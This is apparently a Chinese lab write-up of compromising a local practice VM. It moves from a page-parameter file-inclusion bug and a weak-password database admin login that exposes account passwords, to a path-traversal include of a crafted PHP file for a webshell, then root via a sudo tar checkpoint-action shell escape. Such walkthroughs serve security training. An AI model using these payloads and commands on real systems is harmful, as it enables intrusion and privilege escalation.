1.信息收集
开启了三个端口
访问80端口
发现邮件地址保留可能会有用
wappalyzer指纹识别 php语言 ,ubuntu系统
发现http://192.168.226.128/view.php?page=tools.html发现后面跟着文件名,进行漏洞探测
文件读取漏洞
读取密码文件显示空白肯能是因为没权限
目录扫描
翻找js文件,readme文件未发现有用信息
http://192.168.226.128/package
/dbadmin/
尝试弱口令登录admin 运气挺好 ,试了两个密码
root:
admin:
点击数据库名称
点击info表
记录了账号密码
root账户密码: root/34kroot34
zico账户密码 zico/zico2215@
尝试登录:登陆失败
尝试文件上传但是找不到文件路径不知道网站目录在哪
2.getshell
获取数据库版本信息查找nday
searchsploit
cat /usr/share/exploitdb/exploits/php/webapps/24044.txt
创建一个新数据库
访问http://192.168.226.128/view.php?page=../../../../../../../../../../usr/databases/hack.php发现可以解析,利用这个漏洞getshell
蚁剑连接
3.提权
ssh zico@192.168.226.128
sudo -l
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh